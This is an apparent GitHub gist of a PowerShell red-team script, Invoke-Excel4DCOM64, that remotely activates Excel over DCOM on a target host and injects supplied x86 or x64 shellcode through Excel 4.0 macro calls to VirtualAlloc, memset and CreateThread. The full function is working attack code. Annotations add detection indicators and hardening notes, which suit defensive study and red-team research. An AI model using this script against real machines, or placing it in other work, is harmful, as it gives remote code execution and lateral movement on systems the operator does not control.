
@joeleonjr
Forked from Philts/Invoke-Excel4DCOM64.ps1
Last active June 24, 2020 09:19
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank,
# x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason,
# Excel version detection by Joe Leon (@JoeLeonJr) / FortyNorth Security
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************
function Invoke-Excel4DCOM
{
<#
.SYNOPSIS
Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM.
.DESCRIPTION
Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection.
Use a Powershell version with the same bitness as the Office version when running locally.
This script automatically parses the Excel version (x86 vs x64) and sends the appropriate shellcode.
.PARAMETER Computername
Specify a remote host to inject into.
.PARAMETER Payload86
Specify a file containing the x86 shellcode.
.PARAMETER Payload64
Specify a file containing the x64 shellcode.
.EXAMPLE
PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
Inject payload into excel.exe on server01.
.LINK
http://www.outflank.nl
.NOTES
Outflank - stan@outflank.nl

NOTE(review): the example above predates the Payload86/Payload64 split. The Param
block declares both as mandatory and has no parameter named exactly "Payload".

What the function does, in order: activates Excel.Application over DCOM on
ComputerName, picks a payload file from Excel's install path, then issues three kinds
of XLM CALL() through ExecuteExcel4Macro: VirtualAlloc, one memset per payload byte,
and CreateThread.

Observable behaviour for detection (inferred from the calls below, confirm in a lab):
  - excel.exe on the target is started by COM activation rather than by a user;
    this typically shows as a DcomLaunch svchost parent and an "/automation -Embedding"
    command line.
  - Inbound RPC/DCOM activation of Excel.Application from another host.
  - A private read/write/execute region inside excel.exe and a thread whose start
    address lies in that region rather than in a mapped image.
  - One remote macro call per payload byte, i.e. a long burst of small DCOM requests.
Hardening to consider: restrict remote launch/activation permissions for the Excel
COM server and block workstation-to-workstation RPC where it is not needed.
#>
[CmdletBinding()] Param(
# Target host name or address; passed unchanged to GetTypeFromProgID below.
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
[Alias("PSComputerName","MachineName","IP","IPAddress","Host")]
[String]
$ComputerName,
# Path to the file read as raw bytes when the x86 branch is taken.
[Parameter(Position = 1, Mandatory = $true)]
[Alias("Shellcode86","x86", "86")]
[String]
$Payload86,
# Path to the file read as raw bytes when the x86 check does not match.
[Parameter(Position = 2, Mandatory = $true)]
[Alias("Shellcode64", "x64", "64")]
[String]
$Payload64
)
# Create an instance of the Excel.Application COM object
# The second argument to GetTypeFromProgID names the machine on which the type is
# loaded, so CreateInstance activates Excel on $ComputerName rather than locally.
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
# Bitness is guessed from Excel's reported install path: a path containing "x86"
# (e.g. under "Program Files (x86)") selects the 32-bit payload, anything else is
# handled as 64-bit. This is a path heuristic, not a check of the process architecture.
if ($excel.path -like "*x86*") {
# 0 as the address argument leaves the choice of address to VirtualAlloc.
$lpAddress = 0
$sc = get-content -Encoding Byte $Payload86
}
else {
# If we are using 64bit Excel, try to allocate a low address
# 1342177280 is 0x50000000. The "J" type code used in the CALL() strings below is a
# 32-bit signed integer, so presumably the address has to fit in 32 bits to survive
# the round trip through the macro return value.
$lpAddress = 1342177280
$sc = get-content -Encoding Byte $Payload64
}
# Address allocation
# In the CALL() type string the first letter is the return type and the rest are the
# argument types. 12288 is 0x3000 (MEM_COMMIT | MEM_RESERVE) and 64 is 0x40
# (PAGE_EXECUTE_READWRITE): the region is requested writable and executable at once,
# which is the property memory scanners look for in a process like excel.exe.
$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)')
$count = 0
# Write the payload byte by byte to our allocated buffer
# Each iteration is a separate ExecuteExcel4Macro call that memsets a single byte at
# ($memaddr + $count), so the number of remote calls equals the payload length.
foreach ($byte in $sc) {
# Assigning to $ret keeps the call's return value out of the function's output;
# $ret is not read afterwards.
$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)')
$count = $count + 1
# Progress bar only; percentage is bytes written so far over total payload length.
Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100)
}
# Shellcode Time!
# Starts a thread inside the remote excel.exe with $memaddr as its start address.
# The call's return value is not assigned, so it becomes the function's output.
$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)')
}